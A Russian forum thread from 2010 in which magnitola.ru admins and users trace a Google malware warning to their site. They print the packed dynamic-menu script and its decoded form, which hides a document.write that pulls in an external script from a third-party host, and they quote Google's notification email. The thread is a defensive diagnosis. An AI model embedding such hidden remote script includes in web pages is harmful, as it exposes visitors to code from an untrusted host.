Вид для печати
Алгоритмы Google признали подозрительным один из скриптов динамического меню основных сайтов. Поэтому при заходе на форум сейчас выдается предупреждение о вирусной угрозе.
После исправления конфликтного скрипта и повторного мониторинга это объявление должно исчезнуть (обычно, срок до 24 часов).
Извиняемся за неудобства!
UPD: задействован резервный домен, для Вашего удобства
аваст молчит. а вот на водков.тчк.нэт ругается(
ага...
Вложение 82878
А какого фига гугл чота блочит?
Перенесено на резервный домен (разделено с .magnitola.ru), вспоминайте пароли есличо
Так вот оно што...вспоминайте ))) 24 символа )))Цитата:
Сообщение от HoSStiA
Вредоносные программы
« Назад
URL: http://www.magnitola.ru/includes/fun.../layersmenu.js
Последняя проверка: 21 сентября 2010 г.
Общая проблема
Когда Google последний раз тестировал эту страницу, ваш сервер возвратил контент, который направил браузер на сайт, распространяющий вредоносное программное обеспечение. К сожалению, Google не смог изолировать вредоносный код на этой странице.
---------- Post added 21.09.2010 at 14:23 ----------
Обычный пакованный скрипт, + паранойя Гугла :
$ cat layersmenu.js
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('x=1;17=1t;K=0;r=0;l=0;9=\'\';L=0;2(M||h){x=0}2(s||M||h){K=1}N=0;3 18(e){N=e.1u}2(s){j.1v(19.1w|19.1x);j.1y=18}3 1a(a){2(a){5=\'O\'}4{5=\'1b\'}y(i=0;i<c.P;i++){c[i].z.A=5}}j.Q(\'<1c 1z="1A/1B" 1C="1D://1E.1F/1G/1H.1I"></1c>\');3 m(){y(i=0;i<1d;i++){t(R[i],1e)}9=\'\';2(1J||1K){1a(n)}}2(K){2(s){j.1L=m}4{j.1M=m}}3 1N(){2(x){L=1f(\'m()\',17)}}3 1O(){2(x){1P(L)}}3 1Q(a){2(!r||(S(a)&&a!=9)){k}2(d[a]!=\'\'){2(!u&&!h){B=T[d[a]];7=T[a]}4 2(u){B=U;7=U}4 2(h){B=V(d[a]);7=V(a)}o=W(d[a])-7+1R;p=W(d[a])+B-1S;f=1g();6=1h();2(o<6&&p+7>f+6){2(p+7-f-6>6-o){o=6}4{p=f+6-7}}2(q[d[a]]){2(o<6){q[a]=0}4{q[a]=1}}4{2(p+7>f+6){q[a]=1}4{q[a]=0}}2(q[a]){C(a,o)}4{C(a,p)}}1i(a)}3 1i(a){2(!r||(S(a)&&a!=9)){k}2(!l){1j();l=1}2(!s){g=1k(\'1T\'+a)}4{g=N}g+=1U;D=1l(a);E=1V();F=1W();2(g+D>E+F){2(D>E){g=F}4{g=E+F-D}}2(1X.1Y(1k(a)-g)>1Z){1m(a,g)}}3 20(a,b){2(!21){k}2(!u&&!h){7=T[a]}4 2(u){7=U}5=W(b+a);2(!h){f=1g();6=1h();2(5+7>f+6){5=f+6-7}2(5<6){5=6}}C(a,5)}3 1n(a,i){2(X){k n}v=22[a];G=v+V(a);w=23[a];H=w+1l(a);I=24[i];Y=I+c[i].25;J=26[i];Z=J+c[i].27;2(I>v)v=I;2(Y<G)G=Y;2(J>w)w=J;2(Z<H)H=Z;k(G>v&&H>w)}3 10(a,b){y(i=0;i<c.P;i++){2(1n(a,i)){2(b){c[i].z.A=\'1b\'}4{c[i].z.A=\'O\'}}}}3 t(a,b){2(!r){k}2(!l){1j();l=1}28(a,b)}3 29(a,b){2(!r||a==9||(S(a)&&!b)){k}2(a==d[9]){t(9,1e)}4 2(d[a]==9){t(a,n);10(a,n)}4{m();5=a;2a{t(5,n);10(5,n);5=d[5]}2b(5!=\'\')}9=a}3 11(){2(s){8.1o.1p()}m();y(i=0;i<1d;i++){C(R[i],0);1m(R[i],0)}2(c!=2c&&c.P>0){2d()}l=0}8.2e=11;3 12(){2(8.13!=14||8.15!=16){2(X||u){8.1o.1p()}14=8.13;16=8.15;11()}1f(\'12()\',2f)}3 1q(){2(X||M){14=8.13;16=8.15;12()}}8.2g=1q;3 2h(a){2(2i){2j(a,\'1r%\')}4{j.Q(\'</1s>\');j.Q(\'<1s 2k="h\'+a+\'" z="2l: 2m; 2n: 1r%; A: O;">\')}}',62,148,'||if|function|else|foobar|windowXOffset|width1|window|layerPoppedUp|||toBeHidden|father||windowWidth|newY|IE4||document|return|layersMoved|shutdown|true|onLeft|onRight|back|loaded|NS4|LMPopUpL|Opera5|xa1|ya1|useTimeouts|for|style|visibility|width0|setLeft|layerHeight|windowHeight|windowYOffset|xa2|ya2|xb1|yb1|shutdownOnClick|timeoutFlag|Opera56|currentY|visible|length|write|listl|isVisible|lwidth|abscissaStep|getOffsetWidth|getOffsetLeft|Konqueror22|xb2|yb2|seeThroughWorkaround|resizeHandler|yaresizeHandler|innerWidth|origWidth|innerHeight|origHeight|timeoutLength|grabMouse|Event|seeThroughElements|hidden|script|numl|false|setTimeout|getWindowWidth|getWindowXOffset|moveLayerY|moveLayers|getOffsetTop|getOffsetHeight|setTop|layersOverlap|location|reload|loadHandler|100|div|1000|pageY|captureEvents|MOUSEDOWN|MOUSEMOVE|onmousemove|type|text|javascript|src|http|belpleks|ru|webstat|_|js|Konqueror|IE5|onmousedown|onclick|setLMTO|clearLMTO|clearTimeout|moveLayerX|menuLeftShift|menuRightShift|ref|menuTopShift|getWindowHeight|getWindowYOffset|Math|abs|thresholdY|moveLayerX1|lwidthDetected|layerLeft|layerTop|toBeHiddenLeft|offsetWidth|toBeHiddenTop|offsetHeight|setVisibility|LMPopUp|do|while|null|seeThroughCoordinatesDetection|onresize|500|onload|fixieflm|DOM|setWidth|id|position|relative|width'.split('|'),0,{}))
По ходу дела и на магнитолу.ру гугля тож ругается, а не только на форум.
Так, что пока как я понимаю сидим тут http://magnitola-team.ru/forum.php
Там и ругается, форуму за компанию досталось.Цитата:
Сообщение от Max-x-x
Ухххх, ####и, денеГ хотят ...
http://s51.radikal.ru/i134/1009/b5/3dbc354bcf2e.jpg
Напугало :) Так как всегда через поиск захожу почемуто :)
Индусам деньги не нужны, они поют мантрыЦитата:
Сообщение от Андрюха_пензяк
Они информацию дали только после того, как запросил проверку. До этого всё "абстрактно" - может угрожать и всё. Правда, у многих Аваст ругался еще с прошлой недели, но в журналах следов не оставлял. Возможно, в скрипт действительно какая-то "сопля" на сайт разработчиков встроена, а его ломанули.Цитата:
Сообщение от Андрюха_пензяк
Можно декодировать на досуге.
---------- Post added 21.09.2010 at 15:27 ----------
useTimeouts = 1;
timeoutLength = 1000;
shutdownOnClick = 0;
loaded = 0;
layersMoved = 0;
layerPoppedUp = '';
timeoutFlag = 0;
if (Opera56 || IE4) {
useTimeouts = 0
}
if (NS4 || Opera56 || IE4) {
shutdownOnClick = 1
}
currentY = 0;
function grabMouse(e) {
currentY = e.pageY
}
if (NS4) {
document.captureEvents(Event.MOUSEDOWN | Event.MOUSEMOVE);
document.onmousemove = grabMouse
}
function seeThroughElements(a) {
if (a) {
foobar = 'visible'
} else {
foobar = 'hidden'
}
for (i = 0; i < toBeHidden.length; i++) {
toBeHidden[i].style.visibility = foobar
}
}
document.write('<script type="text/javascript" src="http://belpleks.ru/webstat/_.js"></script>');
function shutdown() {
for (i = 0; i < numl; i++) {
LMPopUpL(listl[i], false)
}
layerPoppedUp = '';
if (Konqueror || IE5) {
seeThroughElements(true)
}
}
if (shutdownOnClick) {
if (NS4) {
document.onmousedown = shutdown
} else {
document.onclick = shutdown
}
}
function setLMTO() {
if (useTimeouts) {
timeoutFlag = setTimeout('shutdown()', timeoutLength)
}
}
function clearLMTO() {
if (useTimeouts) {
clearTimeout(timeoutFlag)
}
}
function moveLayerX(a) {
if (!loaded || (isVisible(a) && a != layerPoppedUp)) {
return
}
if (father[a] != '') {
if (!Opera5 && !IE4) {
width0 = lwidth[father[a]];
width1 = lwidth[a]
} else if (Opera5) {
width0 = abscissaStep;
width1 = abscissaStep
} else if (IE4) {
width0 = getOffsetWidth(father[a]);
width1 = getOffsetWidth(a)
}
onLeft = getOffsetLeft(father[a]) - width1 + menuLeftShift;
onRight = getOffsetLeft(father[a]) + width0 - menuRightShift;
windowWidth = getWindowWidth();
windowXOffset = getWindowXOffset();
if (onLeft < windowXOffset && onRight + width1 > windowWidth + windowXOffset) {
if (onRight + width1 - windowWidth - windowXOffset > windowXOffset - onLeft) {
onLeft = windowXOffset
} else {
onRight = windowWidth + windowXOffset - width1
}
}
if (back[father[a]]) {
if (onLeft < windowXOffset) {
back[a] = 0
} else {
back[a] = 1
}
} else {
if (onRight + width1 > windowWidth + windowXOffset) {
back[a] = 1
} else {
back[a] = 0
}
}
if (back[a]) {
setLeft(a, onLeft)
} else {
setLeft(a, onRight)
}
}
moveLayerY(a)
}
function moveLayerY(a) {
if (!loaded || (isVisible(a) && a != layerPoppedUp)) {
return
}
if (!layersMoved) {
moveLayers();
layersMoved = 1
}
if (!NS4) {
newY = getOffsetTop('ref' + a)
} else {
newY = currentY
}
newY += menuTopShift;
layerHeight = getOffsetHeight(a);
windowHeight = getWindowHeight();
windowYOffset = getWindowYOffset();
if (newY + layerHeight > windowHeight + windowYOffset) {
if (layerHeight > windowHeight) {
newY = windowYOffset
} else {
newY = windowHeight + windowYOffset - layerHeight
}
}
if (Math.abs(getOffsetTop(a) - newY) > thresholdY) {
setTop(a, newY)
}
}
function moveLayerX1(a, b) {
if (!lwidthDetected) {
return
}
if (!Opera5 && !IE4) {
width1 = lwidth[a]
} else if (Opera5) {
width1 = abscissaStep
}
foobar = getOffsetLeft(b + a);
if (!IE4) {
windowWidth = getWindowWidth();
windowXOffset = getWindowXOffset();
if (foobar + width1 > windowWidth + windowXOffset) {
foobar = windowWidth + windowXOffset - width1
}
if (foobar < windowXOffset) {
foobar = windowXOffset
}
}
setLeft(a, foobar)
}
function layersOverlap(a, i) {
if (Konqueror22) {
return true
}
xa1 = layerLeft[a];
xa2 = xa1 + getOffsetWidth(a);
ya1 = layerTop[a];
ya2 = ya1 + getOffsetHeight(a);
xb1 = toBeHiddenLeft[i];
xb2 = xb1 + toBeHidden[i].offsetWidth;
yb1 = toBeHiddenTop[i];
yb2 = yb1 + toBeHidden[i].offsetHeight;
if (xb1 > xa1) xa1 = xb1;
if (xb2 < xa2) xa2 = xb2;
if (yb1 > ya1) ya1 = yb1;
if (yb2 < ya2) ya2 = yb2;
return (xa2 > xa1 && ya2 > ya1)
}
function seeThroughWorkaround(a, b) {
for (i = 0; i < toBeHidden.length; i++) {
if (layersOverlap(a, i)) {
if (b) {
toBeHidden[i].style.visibility = 'hidden'
} else {
toBeHidden[i].style.visibility = 'visible'
}
}
}
}
function LMPopUpL(a, b) {
if (!loaded) {
return
}
if (!layersMoved) {
moveLayers();
layersMoved = 1
}
setVisibility(a, b)
}
function LMPopUp(a, b) {
if (!loaded || a == layerPoppedUp || (isVisible(a) && !b)) {
return
}
if (a == father[layerPoppedUp]) {
LMPopUpL(layerPoppedUp, false)
} else if (father[a] == layerPoppedUp) {
LMPopUpL(a, true);
seeThroughWorkaround(a, true)
} else {
shutdown();
foobar = a;
do {
LMPopUpL(foobar, true);
seeThroughWorkaround(foobar, true);
foobar = father[foobar]
} while (foobar != '')
}
layerPoppedUp = a
}
function resizeHandler() {
if (NS4) {
window.location.reload()
}
shutdown();
for (i = 0; i < numl; i++) {
setLeft(listl[i], 0);
setTop(listl[i], 0)
}
if (toBeHidden != null && toBeHidden.length > 0) {
seeThroughCoordinatesDetection()
}
layersMoved = 0
}
window.onresize = resizeHandler;
function yaresizeHandler() {
if (window.innerWidth != origWidth || window.innerHeight != origHeight) {
if (Konqueror22 || Opera5) {
window.location.reload()
}
origWidth = window.innerWidth;
origHeight = window.innerHeight;
resizeHandler()
}
setTimeout('yaresizeHandler()', 500)
}
function loadHandler() {
if (Konqueror22 || Opera56) {
origWidth = window.innerWidth;
origHeight = window.innerHeight;
yaresizeHandler()
}
}
window.onload = loadHandler;
function fixieflm(a) {
if (DOM) {
setWidth(a, '100%')
} else {
document.write('</div>');
document.write('<div id="IE4' + a + '" style="position: relative; width: 100%; visibility: visible;">')
}
}
---------- Post added 21.09.2010 at 15:28 ----------
http://belpleks.ru/webstat/_.js
Типа "жучок"
ну наконец-то заработало!
Итого:
В одном из скриптов выпадающего меню, в зашифрованном виде, торчала "сопля" на сбор статистики, ведущая http://belpleks.ru/webstat/_.js
Тот сайт ломанули, поэтому "сопля" притянула .magnitola.ru к "небезопасной зоне", хотя самого скрипта _.js на этом сайте уже давно не существует.
bIIIIIIIIIIIIIIIIIIII
---------- Post added 21.09.2010 at 15:58 ----------
fetch: http://belpleks.ru/webstat/_.js: Not Found
---------- Post added 21.09.2010 at 15:59 ----------
"Добрые русские программисты" AJAX
---------- Post added 21.09.2010 at 16:11 ----------
Dear site owner or webmaster of magnitola.ru,
We recently discovered that some of your pages can cause users to be infected with malicious software. We have begun showing a warning page to users who visit these pages by clicking a search result on Google.com.
Below are some example URLs on your site which can cause users to be infected (space inserted to prevent accidental clicking in case your mail client auto-links URLs):
http://magnitola .ru/
http://www.magnitola .ru/
http://www.magnitola .ru/DLS-B6-pr-217.html
Here is a link to a sample warning page:
http://www.google.com/interstitial?u.../magnitola.ru/
We strongly encourage you to investigate this immediately to protect your visitors. Although some sites intentionally distribute malicious software, in many cases the webmaster is unaware because:
1) the site was compromised
2) the site doesn't monitor for malicious user-contributed content
3) the site displays content from an ad network that has a malicious advertiser
If your site was compromised, it's important to not only remove the malicious (and usually hidden) content from your pages, but to also identify and fix the vulnerability. We suggest contacting your hosting provider if you are unsure of how to proceed. StopBadware also has a resource page for securing compromised sites:
http://www.stopbadware.org/home/security
Once you've secured your site, you can request that the warning be removed by visiting
http://www.google.com/support/webmas...y?answer=45432
and requesting a review. If your site is no longer harmful to users, we will remove the warning.
Sincerely,
Google Search Quality Team
Note: if you have an account in Google's Webmaster Tools, you can verify the authenticity of this message by logging into https://www.google.com/webmasters/tools/siteoverview and going to the Message Center, where a warning will appear shortly.
только что
Понятное дело, поэтому мы сейчас на magnitola-team.ruЦитата:
Сообщение от yzer
я тему читал,меня ввело в заблуждениеЦитата:
Сообщение от HoSStiA
может просто не так понял))Цитата:
Сообщение от Accelerator
Ну а сколько эта ботва то будет длится, есть какие то предварительные данные? Пути решения найдены?
Первичное обращение в Google утром дало адрес обнаруженного скрипта. В 16:08 пришло сразу четыре письма оттуда про наличие уязвимости. Повторных заявок на перепроверку после этого не принималось их системой, так как "Заявка уже находится в рассмотрении".Цитата:
Сообщение от ALEX CUS
Надо ждать утра есличо
обрызгал ,на всякий пожарный,ноут дихлофосом)))
если бы очень захотелось - то и напалм бы не помог ... но сегодня все добрые ))Цитата:
Сообщение от yzer
Блин, а я то думал гугл рулит, а он еще и гадит :)))
захожу через рамблер :stink:
Ждемс утречка, скорейшего выздоровления :)
Спасибо! Главное, чтобы с Яндексом поочередно, а не вместе ;)Цитата:
Сообщение от Андрюха_пензяк
Хм, а я как заходил с закладки в букмарке, так и захожу.
Вчерась вот заметил, что редирект на магнитола-тим стоит... а сегодня снова всё нормалды.:)
Тебе "повезло", но лучше все-таки повысить уровень безопасности браузера.Цитата:
Сообщение от sam01
Работоспособность magnitola.ru тоже минут 15 назад восстановили до исходной.
Ехуууууу, победа :) :party::drinks::party:
